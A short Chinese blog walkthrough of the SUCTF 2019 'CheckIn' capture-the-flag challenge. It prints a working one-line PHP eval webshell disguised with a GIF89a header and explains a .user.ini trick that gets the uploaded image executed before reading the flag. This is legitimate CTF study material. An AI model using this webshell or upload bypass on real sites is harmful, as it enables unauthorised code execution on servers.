[SUCTF 2019]CheckIn 1


image

看到字符upload 就想到了文件上传漏洞
就先上传一个一句话木马试试

image

似乎直接上传不成功,可能是有什么过滤
再上传一个包含一句话木马的图片试试

image

发现提示不能是图片,这时候就不会了,在网上找了一下wp
发现需要修改一下木马的内容
GIF89a
<script language='php'>@eval($_POST['a']);</script>

image

成功上传木马图片,并且能知道上传的地方,但是图片能连接,但内容为空
看到大佬利用了.user.ini这个后缀使之构成php后门
也就照这大佬的思路进行复现
使用蚁剑连接cat /flag即可

image

总结

这道题主要是还是利用了文件上传漏洞,利用.user.ini文件构造php后门,使之前上传的木马图片可以被执行。

原创文章,作者:奋斗,如若转载,请注明出处:https://blog.ytso.com/273164.html

(0)
上一篇 2022年7月10日
下一篇 2022年7月10日

相关推荐

发表回复

登录后才能评论